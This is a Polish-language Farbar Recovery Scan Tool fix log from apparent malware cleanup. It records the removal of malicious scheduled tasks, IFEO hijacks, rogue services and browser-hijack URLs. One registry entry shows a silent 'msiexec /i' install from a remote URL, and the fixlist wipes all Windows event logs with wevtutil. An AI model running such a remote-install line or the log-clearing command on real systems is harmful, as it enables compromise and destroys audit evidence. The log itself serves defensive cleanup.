Rezultat naprawy Farbar Recovery Scan Tool (x64) Wersja: 19-11-2017 Uruchomiony przez Robek (21-11-2017 20:19:32) Run:1 Uruchomiony z C:\Users\Robek\Desktop\Downloads Załadowane profile: Robek (Dostępne profile: Robek & vod & DefaultAppPool) Tryb startu: Normal ============================================== fixlist - zawartość: ***************** CloseProcesses: CreateRestorePoint: HKU\S-1-5-21-1414513604-550418378-3547991025-1000\...\ChromeHTML: -> C:\Program Files (x86)\Cupduck\Application\chrome.exe (Google Inc.) <==== UWAGA C:\Program Files (x86)\Cupduck C:\Users\Michał\AppData\Local\Cupduck C:\Users\Michal\AppData\Roaming\Cupduck C:\Program Files (x86)\Firefox C:\Users\Michał\AppData\Local\Firefox C:\Users\Michal\AppData\Roaming\Firefox Task: {014ED373-DBCE-4834-92A0-45678201ED76} - System32\Tasks\RobekBhangsKeypuncherV2 => rundll32.exe SeducibleMycelium.dll,main 7 1 <==== UWAGA Task: {1CE6248E-D2BD-4741-A30D-60FFC3207734} - \WordSurfer Auto Updater 1.10.0.19 Pending Update -> Brak pliku <==== UWAGA Task: {39B8185F-A4D4-4E7A-80C5-01E05DBC16E9} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe <==== UWAGA Task: {5B3448FD-225C-4B21-9B3A-8AFEB55977B0} - \Web Protector Plus -> Brak pliku <==== UWAGA Task: {856FC7A7-E566-4B19-BE6D-940E93667DE9} - System32\Tasks\d639866a9491f79c4d8ac0f8356e1d26 => rundll32.exe "C:\Program Files (x86)\globalUpdate\nmqype.dll",e62dc6c6547f46bda862da2d05af6862 <==== UWAGA Task: {AB83A9DF-E428-4EAA-862A-5A9395D9FF4B} - System32\Tasks\Windows-PG => C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\windows\psgo\psgo.ps1 <==== UWAGA Task: {CDD2DDB4-B89D-4857-A9BF-DDC42EFB8B18} - System32\Tasks\{C7FBCBF8-412A-4D95-8AAE-7F06CC8EC226} => "c:\program files (x86)\cupduck\application\chrome.exe" hxxps://ui.skype.com/ui/0/7.39.0.102/pl/abandoninstall?page=tsProgressBar Task: {D157AE0B-BE5F-4011-8F72-155A5042D3B3} - \WordWizard Auto Updater 1.10.0.24 Pending Update -> Brak pliku <==== UWAGA Task: {FDCC1C73-BCCB-4D26-9290-784F4057522E} - System32\Tasks\WinTOOL => C:\ProgramData\wintools\WintoolUprI.exe [2017-01-18] () <==== UWAGA C:\windows\psgo C:\Program Files (x86)\globalUpdate C:\Program Files (x86)\MIO C:\ProgramData\wintools C:\Users\Robek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk C:\Users\Robek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk C:\Users\Robek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk C:\Users\Robek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\d75398020044c136\Google Chrome.lnk C:\Users\Robek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\70216a91c23d8320\Google Chrome.lnk C:\Users\Robek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\360c22b137d62ce9\Google Chrome.lnk C:\Users\Robek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\BigFarm.lnk C:\Users\Robek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\big_bang_empire.lnk C:\Users\Robek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Internet Explorer.lnk C:\Users\Robek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\1e9dbac0bb94874\Google Chrome.lnk ShortcutWithArgument: C:\Users\Robek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\FIFA 15.lnk -> C:\Program Files (x86)\GTX Box Team\FIFA 15\Launcher.exe () -> hxxp://www.amisites.com/?type=sc&ts=1481136175&z=241cfe77bdf6efe24eda62ag8zeb8gagec5qagcm7m&from=che0812&uid=ST1000LM024XHN-M101MBB_S2SMJ9CD927401 C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ASGRAF\EuroTEST 2014 PWPW\Odinstaluj EuroTEST 2014 PWPW.lnk C:\ProgramData\Microsoft\Windows\GameExplorer\{7AE57EB3-3F0D-48F0-B22A-23F5850ED761}\PlayTasks\4\Detect Tool.lnk C:\ProgramData\Microsoft\Windows\GameExplorer\{7AE57EB3-3F0D-48F0-B22A-23F5850ED761}\PlayTasks\3\Game Manual.lnk C:\ProgramData\Microsoft\Windows\GameExplorer\{7AE57EB3-3F0D-48F0-B22A-23F5850ED761}\PlayTasks\2\ReadMe.txt.lnk C:\ProgramData\Microsoft\Windows\GameExplorer\{7AE57EB3-3F0D-48F0-B22A-23F5850ED761}\PlayTasks\1\Registration.lnk C:\Users\Robek\Desktop\MioMore Desktop 7.50.lnk C:\Users\Robek\Desktop\programy\Norton Internet Security.lnk C:\Users\Robek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Mio\MioMore Desktop 7.50.lnk C:\Users\vod\Links\Downloads.lnk HKLM\...\Policies\Explorer: [EnableShellExecuteHooks] 1 HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ograniczenia <==== UWAGA HKU\S-1-5-21-1414513604-550418378-3547991025-1000\...\Run: [YTDownloader] => "C:\Program Files (x86)\YTDownloader\YTDownloader.exe" /boot HKU\S-1-5-21-1414513604-550418378-3547991025-1000\...\Run: [background_fault] => C:\Users\Robek\AppData\Local\background_fault\aswRD.exe [1419576 2017-04-26] (AVAST Software) <==== UWAGA C:\Users\Robek\AppData\Local\background_fault HKU\S-1-5-21-1414513604-550418378-3547991025-1000\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i hxxp://point.ltdmsjq.com/?data=zDlkMj1SNkE3OWY3FkM4OWFxRWZQN8EdRWq5NjY8FkMcM8Y8RH== /q <==== UWAGA HKU\S-1-5-18\...\Run: [] => [X] IFEO\MRT.exe: [Debugger] C:\Program Files (x86)\Clfick\_ALLOWDEL_b314c\Gubed.exe -Yrrehs IFEO\taskmgr.exe: [Debugger] C:\Program Files (x86)\Clfick CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia <==== UWAGA URLSearchHook: HKLM-x32 -> Domyślne = {CCC7B151-1D8C-11E3-B2AD-F3EF3D58318D} HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.amisites.com/search/?type=ds&ts=1481136175&z=241cfe77bdf6efe24eda62ag8zeb8gagec5qagcm7m&from=che0812&uid=ST1000LM024XHN-M101MBB_S2SMJ9CD927401&q={searchTerms} HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.amisites.com/?type=hp&ts=1481136175&z=241cfe77bdf6efe24eda62ag8zeb8gagec5qagcm7m&from=che0812&uid=ST1000LM024XHN-M101MBB_S2SMJ9CD927401 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.amisites.com/?type=hp&ts=1481136175&z=241cfe77bdf6efe24eda62ag8zeb8gagec5qagcm7m&from=che0812&uid=ST1000LM024XHN-M101MBB_S2SMJ9CD927401 HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.amisites.com/search/?type=ds&ts=1481136175&z=241cfe77bdf6efe24eda62ag8zeb8gagec5qagcm7m&from=che0812&uid=ST1000LM024XHN-M101MBB_S2SMJ9CD927401&q={searchTerms} HKU\S-1-5-21-1414513604-550418378-3547991025-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.amisites.com/search/?type=ds&ts=1481136175&z=241cfe77bdf6efe24eda62ag8zeb8gagec5qagcm7m&from=che0812&uid=ST1000LM024XHN-M101MBB_S2SMJ9CD927401&q={searchTerms} HKU\S-1-5-21-1414513604-550418378-3547991025-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.amisites.com/?type=hp&ts=1481136175&z=241cfe77bdf6efe24eda62ag8zeb8gagec5qagcm7m&from=che0812&uid=ST1000LM024XHN-M101MBB_S2SMJ9CD927401 HKU\S-1-5-21-1414513604-550418378-3547991025-1000\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.amisites.com/search/?type=ds&ts=1481136175&z=241cfe77bdf6efe24eda62ag8zeb8gagec5qagcm7m&from=che0812&uid=ST1000LM024XHN-M101MBB_S2SMJ9CD927401&q={searchTerms} FF Plugin: @microsoft.com/GENUINE -> disabled [Brak pliku] FF Plugin-x32: @microsoft.com/GENUINE -> disabled [Brak pliku] StartMenuInternet: FIREFOX.EXE - C:\Program Files (x86)\Mozilla Firefox\firefox.exe hxxp://www.ourluckysites.com/?type=sc&ts=1495819067&z=47dab1a86d2ac8b6587ff93gez9taw4b3g9t9e3m6o&from=che0812&uid=ST1000LM024XHN-M101MBB_S2SMJ9CD927401 FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\browser\defaults\preferences\prefs.js [2015-09-22] <==== UWAGA (Linkuje do pliku *.cfg) FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\cfg [2015-09-22] <==== UWAGA CHR HKLM\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files (x86)\Norton Internet Security\Engine\22.11.2.7\Exts\Chrome.crx CHR HKLM-x32\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files (x86)\Norton Internet Security\Engine\22.11.2.7\Exts\Chrome.crx S2 CSHMDR; C:\Users\Robek\AppData\Local\CSHMDR\Snare.dll [900096 2017-05-22] (IntertSect Alliance Pty Ltd) [Brak podpisu cyfrowego] <==== UWAGA S2 glory; C:\Users\Robek\AppData\Local\glory\glory.dll [809984 2017-06-02] (glory) [Brak podpisu cyfrowego] <==== UWAGA R2 MCRL; C:\ProgramData\Microsoft\VisualStudio\14.0\2052\msmg.dll [368128 2016-12-09] () [Brak podpisu cyfrowego] <==== UWAGA S2 Themes; C:\Windows\system32\themeservice.dll [44544 2009-07-14] (Microsoft Corporation) [DependOnService: iThemes5]<==== UWAGA S2 globalUpdate; C:\Program Files (x86)\globalUpdate\Update\globalupdate.exe /svc [X] <==== UWAGA S3 globalUpdatem; C:\Program Files (x86)\globalUpdate\Update\globalupdate.exe /medsvc [X] <==== UWAGA S2 Zerdgeghevse; C:\Program Files (x86)\Clfick\pighzabodomCln.dll [X] C:\Users\Robek\AppData\Local\CSHMDR C:\Users\Robek\AppData\Local\glory C:\ProgramData\Microsoft\VisualStudio C:\Program Files (x86)\globalUpdate S3 cpuz134; \??\C:\Users\Robek\AppData\Local\Temp\cpuz134\cpuz134_x64.sys [X] <==== UWAGA U2 CWASRE; Brak ImagePath S3 hwdatacard; system32\DRIVERS\ewusbmdm.sys [X] S3 NAVENG; \??\C:\Program Files (x86)\Norton Internet Security\NortonData\22.5.2.15\Definitions\VirusDefs\20150808.001\ENG64.SYS [X] S3 NAVEX15; \??\C:\Program Files (x86)\Norton Internet Security\NortonData\22.5.2.15\Definitions\VirusDefs\20150808.001\EX64.SYS [X] S1 p1481550202am; \??\C:\Users\Robek\AppData\Local\Temp\bkB5B8.tmp\p1481550202am.sys [X] <==== UWAGA S1 p1481732029am; \??\C:\Users\Robek\AppData\Local\Temp\bkFB11.tmp\p1481732029am.sys [X] <==== UWAGA U2 snare; Brak ImagePath S3 Synth3dVsc; System32\drivers\synth3dvsc.sys [X] S3 tsusbhub; system32\drivers\tsusbhub.sys [X] S3 VGPU; System32\drivers\rdvgkmd.sys [X] U2 WinSnare; Brak ImagePath 2017-11-21 17:32 - 2016-09-28 22:41 - 000001164 _____ C:\Users\Public\Documents\temp.dat 2016-11-29 19:20 - 2016-11-29 19:20 - 007310848 _____ () C:\Users\Robek\AppData\Roaming\agent.dat 2016-11-29 19:20 - 2016-11-29 19:20 - 000140288 _____ () C:\Users\Robek\AppData\Roaming\Installer.dat 2016-11-29 19:20 - 2016-11-29 19:20 - 000018432 _____ () C:\Users\Robek\AppData\Roaming\Main.dat 2016-11-29 19:20 - 2016-11-29 19:20 - 000683520 _____ () C:\Users\Robek\AppData\Roaming\VoyaTam.exe CMD: dir /a "C:\Program Files" CMD: dir /a "C:\Program Files (x86)" CMD: dir /a "C:\Program Files\Common Files\System" CMD: dir /a "C:\Program Files (x86)\Common Files\System" CMD: dir /a C:\ProgramData CMD: dir /a C:\Users\Robek\AppData\Local CMD: dir /a C:\Users\Robek\AppData\LocalLow CMD: dir /a C:\Users\Robek\AppData\Roaming File: C:\Users\Robek\Desktop\FIX.REG CMD: netsh advfirewall reset Hosts: Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} EmptyTemp: ***************** Procesy zostały pomyślnie zamknięte. Punkt przywracania został pomyślnie utworzony. HKU\S-1-5-21-1414513604-550418378-3547991025-1000_Classes\ChromeHTML => klucz pomyślnie usunięto C:\Program Files (x86)\Cupduck => pomyślnie przeniesiono "C:\Users\Michał\AppData\Local\Cupduck" => nie znaleziono. "C:\Users\Michal\AppData\Roaming\Cupduck" => nie znaleziono. C:\Program Files (x86)\Firefox => pomyślnie przeniesiono "C:\Users\Michał\AppData\Local\Firefox" => nie znaleziono. "C:\Users\Michal\AppData\Roaming\Firefox" => nie znaleziono. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{014ED373-DBCE-4834-92A0-45678201ED76} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{014ED373-DBCE-4834-92A0-45678201ED76} => klucz pomyślnie usunięto C:\Windows\System32\Tasks\RobekBhangsKeypuncherV2 => pomyślnie przeniesiono HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\RobekBhangsKeypuncherV2 => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{1CE6248E-D2BD-4741-A30D-60FFC3207734} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1CE6248E-D2BD-4741-A30D-60FFC3207734} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\WordSurfer Auto Updater 1.10.0.19 Pending Update => klucz nie znaleziono. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{39B8185F-A4D4-4E7A-80C5-01E05DBC16E9} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{39B8185F-A4D4-4E7A-80C5-01E05DBC16E9} => klucz pomyślnie usunięto C:\Windows\System32\Tasks\Milimili => pomyślnie przeniesiono HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Milimili => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{5B3448FD-225C-4B21-9B3A-8AFEB55977B0} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5B3448FD-225C-4B21-9B3A-8AFEB55977B0} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Web Protector Plus => klucz nie znaleziono. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{856FC7A7-E566-4B19-BE6D-940E93667DE9} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{856FC7A7-E566-4B19-BE6D-940E93667DE9} => klucz pomyślnie usunięto C:\Windows\System32\Tasks\d639866a9491f79c4d8ac0f8356e1d26 => pomyślnie przeniesiono HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\d639866a9491f79c4d8ac0f8356e1d26 => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{AB83A9DF-E428-4EAA-862A-5A9395D9FF4B} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AB83A9DF-E428-4EAA-862A-5A9395D9FF4B} => klucz pomyślnie usunięto C:\Windows\System32\Tasks\Windows-PG => pomyślnie przeniesiono HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Windows-PG => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{CDD2DDB4-B89D-4857-A9BF-DDC42EFB8B18} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{CDD2DDB4-B89D-4857-A9BF-DDC42EFB8B18} => klucz pomyślnie usunięto C:\Windows\System32\Tasks\{C7FBCBF8-412A-4D95-8AAE-7F06CC8EC226} => pomyślnie przeniesiono HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{C7FBCBF8-412A-4D95-8AAE-7F06CC8EC226} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{D157AE0B-BE5F-4011-8F72-155A5042D3B3} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D157AE0B-BE5F-4011-8F72-155A5042D3B3} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\WordWizard Auto Updater 1.10.0.24 Pending Update => klucz nie znaleziono. HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{FDCC1C73-BCCB-4D26-9290-784F4057522E} => klucz pomyślnie usunięto HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{FDCC1C73-BCCB-4D26-9290-784F4057522E} => klucz pomyślnie usunięto C:\Windows\System32\Tasks\WinTOOL => pomyślnie przeniesiono HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\WinTOOL => klucz pomyślnie usunięto C:\windows\psgo => pomyślnie przeniesiono C:\Program Files (x86)\globalUpdate => pomyślnie przeniesiono "C:\Program Files (x86)\MIO" => nie znaleziono. C:\ProgramData\wintools => pomyślnie przeniesiono C:\Users\Robek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk => pomyślnie przeniesiono C:\Users\Robek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk => pomyślnie przeniesiono C:\Users\Robek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Google Chrome.lnk => pomyślnie przeniesiono C:\Users\Robek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\d75398020044c136\Google Chrome.lnk => pomyślnie przeniesiono C:\Users\Robek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\70216a91c23d8320\Google Chrome.lnk => pomyślnie przeniesiono C:\Users\Robek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\360c22b137d62ce9\Google Chrome.lnk => pomyślnie przeniesiono C:\Users\Robek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\BigFarm.lnk => pomyślnie przeniesiono C:\Users\Robek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\big_bang_empire.lnk => pomyślnie przeniesiono C:\Users\Robek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\Internet Explorer.lnk => pomyślnie przeniesiono C:\Users\Robek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\ImplicitAppShortcuts\1e9dbac0bb94874\Google Chrome.lnk => pomyślnie przeniesiono C:\Users\Robek\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\FIFA 15.lnk => Skrót - argument pomyślnie usunięto. C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ASGRAF\EuroTEST 2014 PWPW\Odinstaluj EuroTEST 2014 PWPW.lnk => pomyślnie przeniesiono C:\ProgramData\Microsoft\Windows\GameExplorer\{7AE57EB3-3F0D-48F0-B22A-23F5850ED761}\PlayTasks\4\Detect Tool.lnk => pomyślnie przeniesiono C:\ProgramData\Microsoft\Windows\GameExplorer\{7AE57EB3-3F0D-48F0-B22A-23F5850ED761}\PlayTasks\3\Game Manual.lnk => pomyślnie przeniesiono C:\ProgramData\Microsoft\Windows\GameExplorer\{7AE57EB3-3F0D-48F0-B22A-23F5850ED761}\PlayTasks\2\ReadMe.txt.lnk => pomyślnie przeniesiono C:\ProgramData\Microsoft\Windows\GameExplorer\{7AE57EB3-3F0D-48F0-B22A-23F5850ED761}\PlayTasks\1\Registration.lnk => pomyślnie przeniesiono C:\Users\Robek\Desktop\MioMore Desktop 7.50.lnk => pomyślnie przeniesiono C:\Users\Robek\Desktop\programy\Norton Internet Security.lnk => pomyślnie przeniesiono C:\Users\Robek\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Mio\MioMore Desktop 7.50.lnk => pomyślnie przeniesiono C:\Users\vod\Links\Downloads.lnk => pomyślnie przeniesiono HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\\EnableShellExecuteHooks => Wartość pomyślnie usunięto HKLM\SOFTWARE\Policies\Microsoft\Windows Defender => klucz pomyślnie usunięto HKU\S-1-5-21-1414513604-550418378-3547991025-1000\Software\Microsoft\Windows\CurrentVersion\Run\\YTDownloader => Wartość pomyślnie usunięto HKU\S-1-5-21-1414513604-550418378-3547991025-1000\Software\Microsoft\Windows\CurrentVersion\Run\\background_fault => Wartość pomyślnie usunięto C:\Users\Robek\AppData\Local\background_fault => pomyślnie przeniesiono HKU\S-1-5-21-1414513604-550418378-3547991025-1000\Software\Microsoft\Windows\CurrentVersion\Policies\system\\Shell => Wartość pomyślnie usunięto HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run\\ => Wartość pomyślnie usunięto HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\MRT.exe => klucz pomyślnie usunięto HKLM\Software\microsoft\windows nt\currentversion\Image File Execution Options\taskmgr.exe => klucz pomyślnie usunięto C:\Program Files (x86)\Clfick => pomyślnie przeniesiono HKLM\SOFTWARE\Policies\Google => klucz pomyślnie usunięto HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\URLSearchHooks\\ => Wartość pomyślnie usunięto HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Search Page => Wartość pomyślnie przywrócono HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Page_URL => Wartość pomyślnie przywrócono HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Page_URL => Wartość pomyślnie przywrócono HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Search_URL => Wartość pomyślnie przywrócono HKU\S-1-5-21-1414513604-550418378-3547991025-1000\Software\Microsoft\Internet Explorer\Main\\Search Page => Wartość pomyślnie przywrócono HKU\S-1-5-21-1414513604-550418378-3547991025-1000\Software\Microsoft\Internet Explorer\Main\\Default_Page_URL => Wartość pomyślnie przywrócono HKU\S-1-5-21-1414513604-550418378-3547991025-1000\Software\Microsoft\Internet Explorer\Main\\Default_Search_URL => Wartość pomyślnie przywrócono HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE => klucz pomyślnie usunięto HKLM\Software\Wow6432Node\MozillaPlugins\@microsoft.com/GENUINE => klucz pomyślnie usunięto HKLM\SOFTWARE\Clients\StartMenuInternet\FIREFOX.EXE\shell\open\command\\Default => Wartość pomyślnie przywrócono C:\Program Files (x86)\mozilla firefox\browser\defaults\preferences\prefs.js => pomyślnie przeniesiono C:\Program Files (x86)\mozilla firefox\cfg => pomyślnie przeniesiono HKLM\SOFTWARE\Google\Chrome\Extensions\cjabmdjcfcfdmffimndhafhblfmpjdpe => klucz pomyślnie usunięto HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\cjabmdjcfcfdmffimndhafhblfmpjdpe => klucz pomyślnie usunięto HKLM\System\CurrentControlSet\Services\CSHMDR => klucz pomyślnie usunięto CSHMDR => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\glory => klucz pomyślnie usunięto glory => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\MCRL => klucz pomyślnie usunięto MCRL => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\Themes\\DependOnService => Wartość pomyślnie usunięto HKLM\System\CurrentControlSet\Services\globalUpdate => klucz pomyślnie usunięto globalUpdate => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\globalUpdatem => klucz pomyślnie usunięto globalUpdatem => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\Zerdgeghevse => klucz pomyślnie usunięto Zerdgeghevse => serwis pomyślnie usunięto C:\Users\Robek\AppData\Local\CSHMDR => pomyślnie przeniesiono C:\Users\Robek\AppData\Local\glory => pomyślnie przeniesiono C:\ProgramData\Microsoft\VisualStudio => pomyślnie przeniesiono "C:\Program Files (x86)\globalUpdate" => nie znaleziono. HKLM\System\CurrentControlSet\Services\cpuz134 => klucz pomyślnie usunięto cpuz134 => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\CWASRE => klucz pomyślnie usunięto CWASRE => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\hwdatacard => klucz pomyślnie usunięto hwdatacard => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\NAVENG => klucz niepowodzenie przy usuwaniu. Odmowa dostępu. HKLM\System\CurrentControlSet\Services\NAVEX15 => klucz niepowodzenie przy usuwaniu. Odmowa dostępu. HKLM\System\CurrentControlSet\Services\p1481550202am => klucz pomyślnie usunięto p1481550202am => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\p1481732029am => klucz pomyślnie usunięto p1481732029am => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\snare => klucz pomyślnie usunięto snare => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\Synth3dVsc => klucz pomyślnie usunięto Synth3dVsc => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\tsusbhub => klucz pomyślnie usunięto tsusbhub => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\VGPU => klucz pomyślnie usunięto VGPU => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\WinSnare => klucz pomyślnie usunięto WinSnare => serwis pomyślnie usunięto C:\Users\Public\Documents\temp.dat => pomyślnie przeniesiono C:\Users\Robek\AppData\Roaming\agent.dat => pomyślnie przeniesiono C:\Users\Robek\AppData\Roaming\Installer.dat => pomyślnie przeniesiono C:\Users\Robek\AppData\Roaming\Main.dat => pomyślnie przeniesiono C:\Users\Robek\AppData\Roaming\VoyaTam.exe => pomyślnie przeniesiono ========= dir /a "C:\Program Files" ========= Wolumin w stacji C nie ma etykiety. Numer seryjny woluminu: E2E4-D2C4 Katalog: C:\Program Files 2017-11-21 20:18 . 2017-11-21 20:18 .. 2014-11-12 22:33 ATI 2014-11-12 22:34 ATI Technologies 2016-01-18 16:48 CanonBJ 2017-11-20 15:14 Common Files 2014-11-12 22:19 CONEXANT 2009-07-14 05:54 174 desktop.ini 2014-11-13 17:59 DIFX 2017-03-15 20:05 DVD Maker 2017-10-10 15:37 Inkscape 2014-12-09 13:29 Intel 2017-11-20 15:17 Internet Explorer 2015-09-14 19:42 Lenovo 2009-07-14 19:09 Microsoft Games 2017-05-29 20:36 Microsoft Office 2017-06-15 02:40 Microsoft Silverlight 2009-07-14 06:32 MSBuild 2017-03-12 19:40 nodejs 2009-07-14 06:32 Reference Assemblies 2014-11-12 22:06 Synaptics 2009-07-14 06:09 Uninstall Information 2014-11-14 11:31 Windows Defender 2014-11-14 08:40 Windows Mail 2017-11-20 15:15 Windows Media Player 2014-11-12 21:20 Windows NT 2014-11-14 08:40 Windows Photo Viewer 2014-11-14 08:40 Windows Portable Devices 2014-11-14 08:40 Windows Sidebar 1 plik(˘w) 174 bajt˘w 28 katalog(˘w) 299˙750˙744˙064 bajt˘w wolnych ========= Koniec CMD: ========= ========= dir /a "C:\Program Files (x86)" ========= Wolumin w stacji C nie ma etykiety. Numer seryjny woluminu: E2E4-D2C4 Katalog: C:\Program Files (x86) 2017-11-21 20:19 . 2017-11-21 20:19 .. 2016-11-29 19:40 21df9cdd-b2af-4092-a824-770b3a5ffb6b 2016-11-29 19:40 4975ed36-f6b5-4050-8828-b2a766cd260c 2016-11-29 19:40 529949c9-cddd-4b69-bd99-ce61486af548 2017-03-08 01:04 58BF4A79_cacayima 2017-03-08 21:28 58C06965_cacayima 2017-03-09 23:34 58C1D864_cacayima 2017-03-14 00:33 58C72C4D_cacayima 2017-03-14 19:31 58C836F2_cacayima 2017-03-15 22:11 58C9ADEB_cacayima 2017-03-16 22:06 58CAFE38_cacayima 2017-03-18 02:02 58CC871E_cacayima 2017-03-24 00:42 58D45C24_cacayima 